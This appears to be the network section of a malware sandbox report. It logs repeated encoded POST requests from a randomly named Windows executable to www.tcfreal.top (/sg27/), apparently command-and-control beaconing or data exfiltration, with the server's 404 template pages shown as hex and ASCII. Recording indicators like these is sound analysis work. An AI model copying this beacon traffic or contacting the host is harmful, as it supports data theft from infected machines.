Jul 27, 2024 08:06:34.488842010 CEST	741	OUT	POST /sg27/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 209 Cache-Control: no-cache Connection: close Host: www.tcfreal.top Origin: http://www.tcfreal.top Referer: http://www.tcfreal.top/sg27/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 52 72 77 4e 33 76 4c 68 36 37 66 55 39 62 75 38 50 45 6a 4d 4f 64 58 38 36 6f 53 63 4c 4e 56 74 53 79 55 6a 6e 4a 2b 2b 69 39 59 66 46 79 53 69 6b 73 70 50 45 48 52 56 68 61 34 42 31 32 6c 33 77 34 54 54 6c 2f 4b 4f 41 50 6b 57 61 53 37 67 37 79 68 74 33 68 77 30 54 30 48 55 72 39 77 65 63 43 73 70 4c 47 44 7a 56 47 43 73 30 6e 66 5a 71 79 75 34 6a 56 6a 68 50 6c 37 55 5a 44 45 50 56 57 58 74 74 49 69 6c 44 2b 43 63 4b 41 51 32 33 33 71 7a 44 42 49 66 70 6e 61 63 4a 38 35 74 36 62 2b 67 78 4a 6f 65 4d 6d 73 36 72 4f 37 69 7a 62 61 31 34 6e 2f 6f 43 37 39 42 5a 59 55 57 70 77 6d 41 63 61 64 6b 41 7a 37 74 Data Ascii: 9Fjx=RrwN3vLh67fU9bu8PEjMOdX86oScLNVtSyUjnJ++i9YfFySikspPEHRVha4B12l3w4TTl/KOAPkWaS7g7yht3hw0T0HUr9wecCspLGDzVGCs0nfZqyu4jVjhPl7UZDEPVWXttIilD+CcKAQ233qzDBIfpnacJ85t6b+gxJoeMms6rO7izba14n/oC79BZYUWpwmAcadkAz7t
Jul 27, 2024 08:06:35.062210083 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 27 Jul 2024 06:06:34 GMT Server: Apache Content-Length: 11834 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 47 69 74 61 6c 20 2d 20 44 69 67 69 74 61 6c 20 41 67 65 6e 63 79 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>DGital - Digital Agency HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500&family=Jost:wght@500;600;700&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" r [TRUNCATED]
Jul 27, 2024 08:06:35.062223911 CEST	224	IN	Data Raw: 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 6c 69 62 2f 6c 69 67 68 74 62 6f 78 2f 63 73 73 2f 6c 69 67 68 74 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 Data Ascii: rel="stylesheet"> <link href="lib/lightbox/css/lightbox.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Styleshe
Jul 27, 2024 08:06:35.062241077 CEST	1236	IN	Data Raw: 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 3c Data Ascii: et --> <link href="css/style.css" rel="stylesheet"></head><body> <div class="container-xxl bg-white p-0"> ... Spinner Start --> <div id="spinner" class="show bg-white position-fixed translate-middle w-100 vh-
Jul 27, 2024 08:06:35.062259912 CEST	1236	IN	Data Raw: 62 61 72 2d 6e 61 76 20 6d 78 2d 61 75 74 6f 20 70 79 2d 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 69 6e 64 65 78 2e 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 Data Ascii: bar-nav mx-auto py-0"> <a href="index.html" class="nav-item nav-link">Home</a> <a href="about.html" class="nav-item nav-link">About</a> <a href="service.html" class="na
Jul 27, 2024 08:06:35.062269926 CEST	1236	IN	Data Raw: 61 69 6e 65 72 2d 78 78 6c 20 70 79 2d 35 20 62 67 2d 70 72 69 6d 61 72 79 20 68 65 72 6f 2d 68 65 61 64 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 6d 79 2d Data Ascii: ainer-xxl py-5 bg-primary hero-header"> <div class="container my-5 py-5 px-lg-5"> <div class="row g-5 py-5"> <div class="col-12 text-center"> <h1 class
Jul 27, 2024 08:06:35.062283039 CEST	1236	IN	Data Raw: 74 2d 63 65 6e 74 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: t-center"> <div class="row justify-content-center"> <div class="col-lg-6"> <i class="bi bi-exclamation-triangle display-1 text-primary"></i> <h1 class="dis
Jul 27, 2024 08:06:35.062295914 CEST	1236	IN	Data Raw: 65 2d 61 6c 74 20 6d 65 2d 33 22 3e 3c 2f 69 3e 2b 30 31 32 20 33 34 35 20 36 37 38 39 30 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 65 6e 76 Data Ascii: e-alt me-3"></i>+012 345 67890</p> <p><i class="fa fa-envelope me-3"></i>info@example.com</p> <div class="d-flex pt-2"> <a class="btn btn-outline-light btn-social"
Jul 27, 2024 08:06:35.062306881 CEST	1236	IN	Data Raw: 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 6c 67 2d 33 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: </div> <div class="col-md-6 col-lg-3"> <p class="section-title text-white h5 mb-4">Gallery<span></span></p> <div class="row g-2"> <div class
Jul 27, 2024 08:06:35.062318087 CEST	1236	IN	Data Raw: 6c 74 3d 22 49 6d 61 67 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 Data Ascii: lt="Image"> </div> </div> </div> <div class="col-md-6 col-lg-3"> <p class="section-title text-white h5 mb-4">Newsletter<sp
Jul 27, 2024 08:06:35.062329054 CEST	1236	IN	Data Raw: 21 2d 2d 2f 2a 2a 2a 20 54 68 69 73 20 74 65 6d 70 6c 61 74 65 20 69 73 20 66 72 65 65 20 61 73 20 6c 6f 6e 67 20 61 73 20 79 6f 75 20 6b 65 65 70 20 74 68 65 20 66 6f 6f 74 65 72 20 61 75 74 68 6f 72 e2 80 99 73 20 63 72 65 64 69 74 20 6c 69 6e Data Ascii: !--/*** This template is free as long as you keep the footer authors credit link/attribution link/backlink. If you'd like to use the template without the footer authors credit link/attribution link/backlink, you can purchase the Credit R
Jul 27, 2024 08:06:35.062340975 CEST	632	IN	Data Raw: 34 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 40 35 2e 30 Data Ascii: 4.1.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0/dist/js/bootstrap.bundle.min.js"></script> <script src="lib/wow/wow.min.js"></script> <script src="lib/easing/easing.min.js"></script> <script

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	62394	203.161.50.128	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:06:37.063756943 CEST	765	OUT	POST /sg27/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 233 Cache-Control: no-cache Connection: close Host: www.tcfreal.top Origin: http://www.tcfreal.top Referer: http://www.tcfreal.top/sg27/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 52 72 77 4e 33 76 4c 68 36 37 66 55 6e 37 2b 38 49 6c 6a 4d 49 39 58 2f 2f 6f 53 63 41 74 56 68 53 79 49 6a 6e 4e 6d 55 69 4c 49 66 46 54 69 69 6e 70 64 50 46 48 52 56 34 71 34 45 74 57 6c 77 77 34 66 71 6c 2f 32 4f 41 50 41 57 61 58 48 67 37 6c 31 69 31 78 77 79 61 55 47 53 76 39 77 65 63 43 73 70 4c 47 6e 4e 56 48 71 73 33 58 76 5a 71 54 75 37 39 6c 6a 6d 47 46 37 55 64 44 45 54 56 57 58 66 74 4b 47 44 44 37 4f 63 4b 45 63 32 35 47 72 6c 4b 42 49 64 32 33 62 4a 43 74 6b 53 7a 61 2f 77 34 4b 6f 66 62 6e 30 6d 6e 59 36 34 76 6f 61 57 71 33 66 71 43 35 6c 7a 5a 34 55 38 72 77 65 41 4f 4e 52 44 50 48 65 4f 62 4a 6c 68 67 6e 52 63 74 38 61 6a 4f 44 79 38 46 4c 35 72 74 41 3d 3d Data Ascii: 9Fjx=RrwN3vLh67fUn7+8IljMI9X//oScAtVhSyIjnNmUiLIfFTiinpdPFHRV4q4EtWlww4fql/2OAPAWaXHg7l1i1xwyaUGSv9wecCspLGnNVHqs3XvZqTu79ljmGF7UdDETVWXftKGDD7OcKEc25GrlKBId23bJCtkSza/w4Kofbn0mnY64voaWq3fqC5lzZ4U8rweAONRDPHeObJlhgnRct8ajODy8FL5rtA==
Jul 27, 2024 08:06:37.637489080 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 27 Jul 2024 06:06:37 GMT Server: Apache Content-Length: 11834 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 47 69 74 61 6c 20 2d 20 44 69 67 69 74 61 6c 20 41 67 65 6e 63 79 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>DGital - Digital Agency HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500&family=Jost:wght@500;600;700&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" r [TRUNCATED]
Jul 27, 2024 08:06:37.637566090 CEST	1236	IN	Data Raw: 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 6c 69 62 2f 6c 69 67 68 74 62 6f 78 2f 63 73 73 2f 6c 69 67 68 74 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 Data Ascii: rel="stylesheet"> <link href="lib/lightbox/css/lightbox.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link h
Jul 27, 2024 08:06:37.637592077 CEST	1236	IN	Data Raw: 61 2d 62 73 2d 74 61 72 67 65 74 3d 22 23 6e 61 76 62 61 72 43 6f 6c 6c 61 70 73 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 62 61 72 73 22 3e 3c 2f 73 70 61 Data Ascii: a-bs-target="#navbarCollapse"> <span class="fa fa-bars"></span> </button> <div class="collapse navbar-collapse" id="navbarCollapse"> <div class="navbar-nav mx-auto py-
Jul 27, 2024 08:06:37.637604952 CEST	1236	IN	Data Raw: 6b 22 3e 43 6f 6e 74 61 63 74 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 22 20 63 6c 61 73 73 3d 22 Data Ascii: k">Contact</a> </div> <a href="" class="btn rounded-pill py-2 px-4 ms-3 d-none d-lg-block">Get Started</a> </div> </nav> <div class="container-xxl py-5 bg-p
Jul 27, 2024 08:06:37.637628078 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 4e 61 76 62 61 72 20 26 20 48 65 72 6f 20 45 6e 64 20 2d 2d 3e 0d 0a 0d 0a 0d 0a 20 20 20 20 20 20 20 20 Data Ascii: </div> </div> ... Navbar & Hero End --> ... 404 Start --> <div class="container-xxl py-5 wow fadeInUp" data-wow-delay="0.1s"> <div class="container px-lg-5 text-center">
Jul 27, 2024 08:06:37.637646914 CEST	1120	IN	Data Raw: 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 73 65 63 74 69 6f 6e 2d 74 69 74 6c 65 20 74 65 78 74 2d 77 68 69 74 65 20 68 35 20 6d 62 2d 34 22 3e 41 64 64 72 65 73 73 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 0d 0a 20 20 20 20 Data Ascii: <p class="section-title text-white h5 mb-4">Address<span></span></p> <p><i class="fa fa-map-marker-alt me-3"></i>123 Street, New York, USA</p> <p><i class="fa fa-phone-alt me-3"></i>+01
Jul 27, 2024 08:06:37.637679100 CEST	1236	IN	Data Raw: 6c 69 6e 6b 22 20 68 72 65 66 3d 22 22 3e 41 62 6f 75 74 20 55 73 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 Data Ascii: link" href="">About Us</a> <a class="btn btn-link" href="">Contact Us</a> <a class="btn btn-link" href="">Privacy Policy</a> <a class="btn btn-link" href="">Terms & Con
Jul 27, 2024 08:06:37.637690067 CEST	224	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 34 22 3e 0d 0a 20 20 20 20 Data Ascii: </div> <div class="col-4"> <img class="img-fluid" src="img/portfolio-5.jpg" alt="Image"> </div>
Jul 27, 2024 08:06:37.637701988 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 63 6c 61 73 73 3d 22 69 6d 67 2d Data Ascii: <div class="col-4"> <img class="img-fluid" src="img/portfolio-6.jpg" alt="Image"> </div> </div> </div>
Jul 27, 2024 08:06:37.637712955 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 63 6f 70 79 3b 20 3c 61 20 63 6c 61 73 73 3d 22 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 22 20 68 72 65 66 3d 22 23 22 3e 59 6f 75 72 20 53 69 74 65 20 4e 61 6d 65 3c 2f 61 3e 2c 20 41 6c 6c 20 52 Data Ascii: © <a class="border-bottom" href="#">Your Site Name</a>, All Right Reserved. .../*** This template is free as long as you keep the footer authors credit link/attribution link/backlink. If you'd like to
Jul 27, 2024 08:06:37.638120890 CEST	748	IN	Data Raw: 6f 77 2d 75 70 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 4a 61 76 61 53 63 72 69 70 74 20 4c 69 62 72 61 72 69 65 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d Data Ascii: ow-up"></i></a> </div> ... JavaScript Libraries --> <script src="https://code.jquery.com/jquery-3.4.1.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0/dist/js/bootstrap.bundle.min.js"></script>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	62395	203.161.50.128	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:06:39.698824883 CEST	1778	OUT	POST /sg27/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 1245 Cache-Control: no-cache Connection: close Host: www.tcfreal.top Origin: http://www.tcfreal.top Referer: http://www.tcfreal.top/sg27/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 52 72 77 4e 33 76 4c 68 36 37 66 55 6e 37 2b 38 49 6c 6a 4d 49 39 58 2f 2f 6f 53 63 41 74 56 68 53 79 49 6a 6e 4e 6d 55 69 4c 41 66 45 6c 57 69 6c 4b 31 50 43 48 52 56 6e 61 34 46 74 57 6b 31 77 34 48 75 6c 2f 36 42 41 4e 6f 57 62 31 2f 67 71 68 5a 69 38 78 77 79 46 45 48 56 72 39 77 78 63 44 41 74 4c 47 33 4e 56 48 71 73 33 55 33 5a 36 53 75 37 2f 6c 6a 68 50 6c 37 6d 5a 44 45 76 56 57 76 50 74 4b 43 31 44 49 47 63 4b 67 77 32 37 30 7a 6c 53 52 49 54 33 33 61 4b 43 74 6f 7a 7a 61 6a 38 34 4a 30 78 62 6c 6f 6d 6c 35 4c 77 7a 62 57 42 39 55 4c 78 54 4f 46 35 66 4e 49 78 72 78 53 74 66 4f 74 53 42 47 71 78 66 74 52 44 30 56 70 66 6c 4d 6d 4c 47 56 44 70 41 37 34 30 35 79 39 6c 4f 69 75 7a 32 34 37 32 4b 65 44 71 37 49 68 54 50 74 7a 53 36 6b 30 7a 6f 64 41 47 2f 41 63 6a 67 72 55 6c 4f 49 4d 41 76 76 7a 34 46 37 4d 43 43 79 67 36 70 7a 34 4b 57 4d 78 56 76 45 34 58 66 31 51 36 58 50 37 2f 51 75 49 68 6f 32 6b 71 53 6e 39 4a 45 2b 6c 54 32 65 70 51 73 45 70 78 6a 49 4a 7a 63 62 4f 59 68 [TRUNCATED] Data Ascii: 9Fjx=RrwN3vLh67fUn7+8IljMI9X//oScAtVhSyIjnNmUiLAfElWilK1PCHRVna4FtWk1w4Hul/6BANoWb1/gqhZi8xwyFEHVr9wxcDAtLG3NVHqs3U3Z6Su7/ljhPl7mZDEvVWvPtKC1DIGcKgw270zlSRIT33aKCtozzaj84J0xbloml5LwzbWB9ULxTOF5fNIxrxStfOtSBGqxftRD0VpflMmLGVDpA7405y9lOiuz2472KeDq7IhTPtzS6k0zodAG/AcjgrUlOIMAvvz4F7MCCyg6pz4KWMxVvE4Xf1Q6XP7/QuIho2kqSn9JE+lT2epQsEpxjIJzcbOYh8UlQZK+7US/ae7i9S6CP2VN9YE6OGOyqdA9COjg/8OZLKgnWbjPDKhBZKsfbFGMmM1Cl/z/kAuSXOoQ8N8cVqNO60U/0EYy8Z74UUjgsR4hUq7/J337OoM77rnobzeImUVfPnYy67IYzB2zqM9sZDaG0kfoypoKi1rs2zBYPnKF2T6DyDT9UreTjoDXPXopjbnQ93fXIGtjnqEp22XnAc5lyk36/fg1015T6vyXtWd1ftu5NsLx5vYpNNOOEXboRWdshhMxF7zsZ4/VAVg+Wbf9ZUKht40vMDjXqwdB701yNqw8ZLv33bE4BPsXL/vK0sBNkLz8MqNLLhGpUkXnpQF78tihlcdMHLY9fozlQvxMJWnSS8rE367BkDr2rgQ6ygmOjN1qD3ldKy0xi2D6KEOBQSaQzjZ3yEAPaEtFpIpiT59AdYfisAsvXRLRE+ZXXU/3u+vwmd2fyMpuU/wwwZMM/R7YC7bXKhpgbWVli4WPc+ALlnY1MxDDt9EINBdQjHQkrIfdNRd9+gEQZtTDW8TTzBRplSeopu3LjwKKLcrygtKFuVHiw3CRaZVtatpRt3a6J5AfwwGlbejq+/jifWfQh83jJwoprwh74c1HR8Wib97BZdcNcXkmaTIgnge5mFJu4QicG4aaQpt40GAM0lOejsI0HO9aKAS [TRUNCATED]
Jul 27, 2024 08:06:40.286413908 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 27 Jul 2024 06:06:40 GMT Server: Apache Content-Length: 11834 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 47 69 74 61 6c 20 2d 20 44 69 67 69 74 61 6c 20 41 67 65 6e 63 79 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>DGital - Digital Agency HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500&family=Jost:wght@500;600;700&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" r [TRUNCATED]
